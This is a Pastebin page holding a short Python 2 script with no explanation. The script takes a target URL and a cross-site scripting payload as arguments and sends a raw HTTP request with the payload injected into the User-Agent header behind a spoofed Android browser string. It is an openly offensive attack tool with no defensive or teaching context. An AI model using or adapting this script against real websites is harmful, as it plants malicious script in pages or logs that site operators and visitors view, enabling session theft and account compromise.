Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import socket
- from sys import argv
- def parse_url(target_url):
- start = target_url.find("://")
- strip_url = target_url[start + 3:] if start != -1 else target_url
- return strip_url.split('/', 1)
- if len(argv) != 3:
- print "usage: python %s '<target_url>' '<xss_payload>'" % argv[0]
- exit(1)
- domain_name, path = parse_url(argv[1])
- xss_payload = argv[2]
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- addr = socket.gethostbyname(domain_name)
- s.connect((addr, 80))
- request = [
- "GET /%s HTTP/1.1" % path,
- "Host: %s" % domain_name,
- "User-Agent: %sMozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" % xss_payload,
- "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
- "Accept-Language: en-US,en;q=0.5",
- "Accept-Encoding: gzip, deflate",
- "Connection: close" ]
- http_request = "\r\n".join(request)
- http_request += "\r\n\r\n"
- s.sendall(http_request)
- s.recv(4096)
- s.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement